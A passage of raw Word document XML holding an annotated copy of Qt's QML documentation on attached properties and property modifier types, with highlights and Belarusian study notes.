          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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new</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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"January 01, 2015 10:45:00"</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MessageBoard</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onPublished</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Message by"</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author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"has been</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>published!"</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B604FD" w:rsidRPr="00872543" w:rsidRDefault="003B7F34" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00B604FD" w:rsidRPr="00B604FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Атрымалася. Я яшчэ зарэгістр</w:t>
      </w:r>
      <w:r w:rsidR="00B604FD" w:rsidRPr="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">аваў </w:t>
      </w:r>
      <w:r w:rsidR="00B604FD" w:rsidRPr="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching</w:t>
      </w:r>
      <w:r w:rsidR="00B604FD" w:rsidRPr="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B604FD" w:rsidRPr="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidR="00B604FD" w:rsidRPr="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> як і звычайна.</w:t>
      </w:r>
      <w:r w:rsidR="00872543" w:rsidRPr="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00872543" w:rsidRPr="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Не… нават калі макрас дадаю, то ўсё працуе…</w:t>
      </w:r>
      <w:r w:rsidR="00872543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> усё як бы працуе, але, атрымліваецца, макрас гэты не патрэбны.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="003B7F34" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally, the C++ implementation may access the attached object instance that has been attached to any object by calling the</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId254" w:anchor="qmlAttachedPropertiesObject" w:history="1">
        <w:r w:rsidRPr="003B7F34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlAttachedPropertiesObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function.</w:t>
      </w:r>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DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example:</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Message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msg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someMessageInstance</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MessageBoardAttachedType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attached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qobject_cast</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBoardAttachedType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlAttachedPropertiesObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBoard</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msg</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490E7E" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId255" w:anchor="qDebug" w:history="1">
        <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="pln"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="FFFFFF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qDebug</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Value of MessageBoard.expired:"</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> attached</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expired</w:t>
      </w:r>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="003B7F34">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="302" w:name="property-modifier-types"/>
      <w:bookmarkStart w:id="303" w:name="_Toc483000596"/>
      <w:bookmarkStart w:id="304" w:name="_Toc483003614"/>
      <w:bookmarkStart w:id="305" w:name="_Toc483603949"/>
      <w:bookmarkStart w:id="306" w:name="_Toc483605169"/>
      <w:bookmarkEnd w:id="302"/>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Modifier Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
      <w:bookmarkEnd w:id="304"/>
      <w:bookmarkEnd w:id="305"/>
      <w:bookmarkEnd w:id="306"/>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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A property modifier type is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>special kind of QML object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A property modifier type instance </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affects a property</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (of a QML object instance) which it is applied to. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>two different kinds</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve"> of property modifier types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00A61423" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>property value write interceptors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>property value sources</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property value write interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to filter or modify values as they are written to properties. Currently, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> supported property value write interceptor is the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId256" w:history="1">
        <w:r w:rsidRPr="00A61423">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type provided by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QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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A </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property value source</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61423">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to automatically update</w:t>
      </w:r>
